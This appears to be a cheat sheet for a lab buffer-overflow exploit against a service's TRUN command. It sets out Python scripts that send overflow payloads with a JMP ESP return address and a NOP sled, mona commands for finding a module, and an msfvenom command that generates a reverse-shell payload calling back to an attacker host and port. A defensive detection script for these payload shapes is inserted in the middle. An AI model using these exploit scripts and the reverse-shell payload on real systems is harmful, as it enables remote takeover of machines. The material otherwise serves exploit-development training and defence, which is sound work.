    import sys, socket

    badchar = ("\x01...\xff")   # all bad chars will be sent
    shellcode = 'A' * 2003 + 'B' * 4 + badchar

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('10.0.2.14', 9999))
        s.send(('TRUN /.:/' + shellcode))
        s.close()
    except:
        print("Error Connecting to the Server")
        sys.exit()

Byte ranges sent in the bad-character string (\x01 to \xff, \x00 excluded):
01-09  0a-0f  10-19  1a-1f
20-29  2a-2f  30-39  3a-3f
40-49  4a-4f  50-59  5a-5f
60-69  6a-6f  70-79  7a-7f
80-89  8a-8f  90-99  9a-9f
a0-a9  aa-af  b0-b9  ba-bf
c0-c9  ca-cf  d0-d9  da-df
e0-e9  ea-ef  f0-f9  fa-ff

Go to the hex dump: right click ESP (top) in the registers > Follow in Dump > OK. We will go through this whole list and see if there is anything out of place. Now we got 01 02 03 ... B0 ... B6 B7 B8: B4 and B5 are missing -> those are bad characters. This is an eye test; we need to make sure we find everything which is out of place.

6. FINDING THE RIGHT MODULE | Find JMP ESP: goal: to find a JMP ESP that we will use to tell the application to execute our code. mona modules > select the module with all False, meaning no memory protection in this module.
!mona modules; nasm_shell -> JMP ESP; !mona find -s "\xff\xe4" -m essfunc.dll; right click on the panel > search for the return address we found; it will have the JMP ESP & FFE4 location; F2 > put a breakpoint.


Buffer Overflows (OSCP procedure) (cont)

    #!/usr/bin/python
    import sys, socket

    # 625011AF
    shellcode = 'A' * 2003 + '\xaf\x11\x50\x62'

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('10.0.2.14', 9999))
        s.send(('TRUN /.:/' + shellcode))
        s.close()
    except:
        print("Error Connecting to the Server")
        sys.exit()

Finally, we were able to give EIP a valid return address (JMP ESP) where it can point to in memory. Ran our script with that pointer address, affecting the EIP area directly. Changed EIP return address - DONE!

7. GENERATING SHELLCODE: our EIP will point to the JMP ESP, which will run our malicious shellcode and give us root (hopefully). msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"

    #!/usr/bin/python
    import sys, socket

    overflow = ("Inside this malicious shellcode")
    shellcode = 'A' * 2003 + '\xaf\x11\x50\x62' + '\x90' * 32 + overflow

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('10.0.2.14', 9999))
        s.send(('TRUN /.:/' + shellcode))
        s.close()
    except:
        print("Error Connecting to the Server")
        sys.exit()

Buffer Overflows (OSCP procedure) (cont)

Shellcode needs 4 things: 1. the exact number of bytes to crash (crash point) 2. the value of the JMP ESP that will instruct the application to execute our code (return address) 3. padding (NOPs) 4. shellcode to grab a reverse shell
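Each step of this procedure, from the fuzzing script in step 2 to the final payload in step 7, sends a TRUN command whose argument looks nothing like normal use: thousands of repeated bytes, a Metasploit-style cyclic pattern, a sweep of every byte value, or a NOP sled ahead of the shellcode. The Python below is an added example (not from the cheat sheet or the course notes it cites) of a triage function a defender would run over captured commands to this service to spot those shapes. The captures, the 256-byte argument limit and the indicator names are constructed assumptions for the demo.

```python
import re

# Constructed captures of the "TRUN /.:/<argument>" command the page fuzzes (not real traffic).
SAMPLES = {
    "normal":   b"TRUN /.:/hello",
    "fuzz":     b"TRUN /.:/" + b"A" * 3000,
    "cyclic":   b"TRUN /.:/" + b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0" * 40,
    "sled":     b"TRUN /.:/" + b"A" * 2003 + b"\xaf\x11\x50\x62" + b"\x90" * 32 + b"\xcc" * 100,
    "badchars": b"TRUN /.:/" + b"A" * 2003 + b"BBBB" + bytes(range(1, 256)),
}

MAX_ARG_LEN = 256                                   # assumed sane limit for a TRUN argument
CYCLIC = re.compile(rb"(?:[A-Z][a-z][0-9]){8,}")   # Metasploit pattern_create text shape


def longest_run(data):
    """Length of the longest run of one repeated byte (overflow padding, NOP sleds)."""
    best = cur = 0
    prev = None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best


def inspect_command(payload):
    """Return the indicator names found in one captured TRUN command ([] if clean)."""
    if not payload.startswith(b"TRUN "):
        return []
    arg = payload[len(b"TRUN "):]
    hits = []
    if len(arg) > MAX_ARG_LEN:
        hits.append("oversized_argument")
    if longest_run(arg) >= 64:
        hits.append("long_repeat_run")
    if b"\x90" * 16 in arg:
        hits.append("nop_sled")
    if CYCLIC.search(arg):
        hits.append("cyclic_pattern")
    # Near-complete coverage of the byte space in one argument is the bad-character probe.
    if len(set(arg)) >= 200:
        hits.append("byte_sweep")
    return hits


def triage(captures):
    """Keep only the captures that raised at least one indicator."""
    result = {}
    for name, payload in captures.items():
        hits = inspect_command(payload)
        if hits:
            result[name] = hits
    return result


if __name__ == "__main__":
    for name, hits in triage(SAMPLES).items():
        print(f"{name}: {hits}")
```

The argument-length check alone catches every step of the procedure on this service, because the whole method depends on sending far more than the program expects; the other indicators tell an analyst which stage of exploit development the traffic came from.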

8. ROOT | Exploit: check that real-time protection and antivirus are off while playing with this method. \x41, \x42, \x43 are the hexadecimal values for A, B and C.

Anatomy of the stack: ESP (Extended Stack Pointer): it's at the TOP. Buffer space: fills and grows downward; it should stop before EBP & EIP. EBP (Extended Base Pointer): it's at the BOTTOM. EIP (Extended Instruction Pointer): it's the return address.

ESP: the Extended Stack Pointer (ESP) is a register that lets you know where on the stack you are and allows you to push data in and out of the application.

EIP: it's the return address, and we can use this address to point wherever we choose; it can be malicious code to gain a reverse shell. The Extended Instruction Pointer (EIP) is a register that contains the address of the next instruction for the program or command.


Buffer Overflows (OSCP procedure) (cont)

JMP: the Jump (JMP) is an instruction that modifies the flow of execution, where the operand you designate contains the address being jumped to.

1 Spiking: method to find the vulnerable part of the program
2 Fuzzing: we send a bunch of characters to the program to check if it breaks it
3 Finding the offset: if we break it, we want to find out the point at which we break it
4 Overwriting the EIP: we use that offset to override the EIP, so that the pointer address can be controlled (+ EIP controlled)
5 Finding bad characters
6 Finding the right module
7 Generating shellcode (+ Root)
